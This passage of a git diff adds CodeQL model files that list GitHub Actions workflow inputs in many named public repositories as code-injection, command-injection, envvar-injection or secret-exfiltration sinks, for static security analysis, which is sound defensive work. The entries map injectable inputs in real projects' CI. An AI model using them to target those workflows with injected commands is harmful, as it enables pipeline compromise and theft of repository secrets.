- ["stdlib-js/stdlib/.github/workflows/lint_autofix.yml", "*", "input.pull_request_number", "code-injection", "generated"] + - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "input.user", "code-injection", "generated"] + - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "input.pull_request_number", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml new file mode 100644 index 000000000000..5079e80e7610 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.patch", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.minor", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.major", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.preName", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.pre", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml new file mode 100644 index 000000000000..ccaf2628951d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "input.patch_path", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml", "*", "input.ref", "output.ref", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml new file mode 100644 index 000000000000..56344ff35b64 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["supabase/auth/.github/workflows/publish.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml new file mode 100644 index 000000000000..f2b4cd4eff31 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "input.image", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml new file mode 100644 index 000000000000..f38f0d43c4c8 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "input.workflow_run", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "input.pull_request_number", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "output.pull_request_head_sha", "taint", "manual"] + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "output.pull_request_number", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml new file mode 100644 index 000000000000..85e61e866dc0 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.map", "code-injection", "generated"] + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.minor", "code-injection", "generated"] + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.major", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml new file mode 100644 index 000000000000..9f984f488f7d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "input.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml new file mode 100644 index 000000000000..f13f9b871142 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "input.target", "code-injection", "generated"] + - ["tiann/kernelsu/.github/workflows/avd-kernel.yml", "*", "input.manifest_name", "code-injection", "generated"] + - ["tiann/kernelsu/.github/workflows/wsa-kernel.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml new file mode 100644 index 000000000000..b021069745f9 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "input.asan", "code-injection", "generated"] + - ["tiledb-inc/tiledb/.github/workflows/append-release-cmake.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml new file mode 100644 index 000000000000..dae9a68727e3 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml new file mode 100644 index 000000000000..4ea3849560dc --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "input.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml new file mode 100644 index 000000000000..ff4b4ccf353e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "input.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml new file mode 100644 index 000000000000..d3649a5ebf33 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.framework", "code-injection", "generated"] + - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml new file mode 100644 index 000000000000..22ff2d5a29be --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "input.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml new file mode 100644 index 000000000000..f151d0a2c20f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.pace", "code-injection", "generated"] + - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.next", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml new file mode 100644 index 000000000000..e08f9de22977 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.server_id", "code-injection", "generated"] + - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.secondary_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml new file mode 100644 index 000000000000..fc009bce95a9 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "input.hz", "code-injection", "generated"] + - ["vert-x3/vertx-hazelcast/.github/workflows/ci.yml", "*", "input.hz", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml new file mode 100644 index 000000000000..5e5870c64c7e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "input.workspace", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml new file mode 100644 index 000000000000..2262cf5115f4 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml new file mode 100644 index 000000000000..a18ef96e87e7 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml new file mode 100644 index 000000000000..2ea0842c72bc --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows-msvc.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-ubuntu.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-manylinux.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml new file mode 100644 index 000000000000..65f027175b21 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.profile", "code-injection", "generated"] + - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml new file mode 100644 index 000000000000..14c3c8378c6d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml @@ -0,0 +1,21 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "input.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-k8s-version.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-k8s-version-and-container-registry.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-container-registry.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.scope", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "input.scope", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "input.packages", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml new file mode 100644 index 000000000000..c1a51cefdcdb --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "input.tests", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml new file mode 100644 index 000000000000..c9b7394f044d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.build-arguments", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.test-arguments", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.maven-repo-path", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build.yml", "*", "input.git-log-number", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml new file mode 100644 index 000000000000..36c50c6ad506 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.target", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.source", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.prerelease", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.version", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "input.channel", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml new file mode 100644 index 000000000000..fc0607380ffe --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "input.config_file", "code-injection", "generated"] + - ["zenml-io/zenml/.github/workflows/integration-test-slow.yml", "*", "input.test_environment", "code-injection", "generated"] + - ["zenml-io/zenml/.github/workflows/integration-test-fast.yml", "*", "input.test_environment", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml new file mode 100644 index 000000000000..122a61c76fbf --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "input.needs_context", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml new file mode 100644 index 000000000000..26ff1b8d07c4 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.build_image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "input.version", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "output.build_image", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/8398a7_action-slack.model.yml b/actions/ql/lib/ext/manual/8398a7_action-slack.model.yml new file mode 100644 index 000000000000..62ffad944930 --- /dev/null +++ b/actions/ql/lib/ext/manual/8398a7_action-slack.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection", "manual"] \ No newline at end of file diff --git a/actions/ql/lib/ext/manual/AsasInnab_regex-action.model.yml b/actions/ql/lib/ext/manual/AsasInnab_regex-action.model.yml new file mode 100644 index 000000000000..d09b5bf0085e --- /dev/null +++ b/actions/ql/lib/ext/manual/AsasInnab_regex-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["AsasInnab/regex-action", "*", "input.search_string", "output.first_match", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/MeilCli_regex-match.model.yml b/actions/ql/lib/ext/manual/MeilCli_regex-match.model.yml new file mode 100644 index 000000000000..45a4441e5ca9 --- /dev/null +++ b/actions/ql/lib/ext/manual/MeilCli_regex-match.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["MeilCli/regex-match", "*", "input.search_string", "output.matched_first", "taint", "manual"] + - ["MeilCli/regex-match", "*", "input.search_string", "output.matched_json", "taint", "manual"] + diff --git a/actions/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml b/actions/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml new file mode 100644 index 000000000000..2f38a2588679 --- /dev/null +++ b/actions/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["SonarSource/sonarcloud-github-action", "*", "input.args", "secret-exfiltration", "manual"] + diff --git a/actions/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml b/actions/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml new file mode 100644 index 000000000000..ba894b157329 --- /dev/null +++ b/actions/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["Steph0/dotenv-configserver", "*", "input.repository", "envvar-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml b/actions/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml new file mode 100644 index 000000000000..a29b008f6c2c --- /dev/null +++ b/actions/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + # https://github.com/WyriHaximus/github-action-files-in-commit + - ["WyriHaximus/github-action-files-in-commit", "*", "output.files", "filename", "manual"] + + diff --git a/actions/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml b/actions/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml new file mode 100644 index 000000000000..045e1177ae20 --- /dev/null +++ b/actions/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["aarcangeli/load-dotenv", "*", "artifact", "envvar-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/ab185508_file-type-finder.model.yml b/actions/ql/lib/ext/manual/ab185508_file-type-finder.model.yml new file mode 100644 index 000000000000..011f078ff688 --- /dev/null +++ b/actions/ql/lib/ext/manual/ab185508_file-type-finder.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + # https://github.com/ab185508/file-type-finder + - ["ab185508/file-type-finder", "*", "output.paths", "filename", "manual"] + - ["ab185508/file-type-finder", "*", "output.names", "filename", "manual"] + - ["ab185508/file-type-finder", "*", "output.extaddpaths", "filename", "manual"] + diff --git a/actions/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml b/actions/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml new file mode 100644 index 000000000000..ea86e6f5ec7a --- /dev/null +++ b/actions/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["actions-ecosystem/action-regex-match", "*", "input.text", "output.*", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/actions_github-script.model.yml b/actions/ql/lib/ext/manual/actions_github-script.model.yml new file mode 100644 index 000000000000..3033719bc3b5 --- /dev/null +++ b/actions/ql/lib/ext/manual/actions_github-script.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["actions/github-script", "*", "input.script", "code-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml b/actions/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml new file mode 100644 index 000000000000..f245519a061c --- /dev/null +++ b/actions/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["ahmadnassri/action-changed-files", "*", "output.files", "filename", "manual"] + - ["ahmadnassri/action-changed-files", "*", "output.json", "json", "manual"] diff --git a/actions/ql/lib/ext/manual/akefirad_loadenv-action.model.yml b/actions/ql/lib/ext/manual/akefirad_loadenv-action.model.yml new file mode 100644 index 000000000000..0116f070183f --- /dev/null +++ b/actions/ql/lib/ext/manual/akefirad_loadenv-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["akefirad/loadenv-action", "*", "artifact", "envvar-injection", "manual"] + diff --git a/actions/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml b/actions/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml new file mode 100644 index 000000000000..c272955c58ef --- /dev/null +++ b/actions/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml @@ -0,0 +1,21 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint", "manual"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.region", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.stack", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.team", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.docker_heroku_process_type", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.docker_build_args", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.branch", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.appdir", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_api_key", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_email", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml b/actions/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml new file mode 100644 index 000000000000..5523b7c50675 --- /dev/null +++ b/actions/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + 